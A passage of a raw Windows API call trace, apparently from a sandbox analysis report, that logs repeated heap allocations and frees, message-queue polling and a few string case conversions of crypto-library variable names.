RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x16907) returned 0x955018 [0035.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0035.728] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.728] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0035.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0035.729] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0035.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889af0 [0035.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0035.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0035.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0035.729] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x16907) returned 0x88ffb0 [0035.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0035.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.730] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0035.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0035.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.730] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.731] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0035.731] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0035.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0035.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.731] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0035.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.731] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3a8 [0035.731] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0035.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cda8 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0035.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.732] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0035.732] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0035.732] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.732] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0035.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0035.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0035.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0035.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0035.733] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.733] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0035.733] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0035.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0035.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0035.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0035.734] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0035.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0035.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0035.734] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0035.734] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.735] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.735] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0035.735] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.735] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0035.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0035.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0035.736] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0035.736] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.737] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0035.737] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0035.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0035.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.738] RtlAllocateHeap (HeapHandle=0x770000, 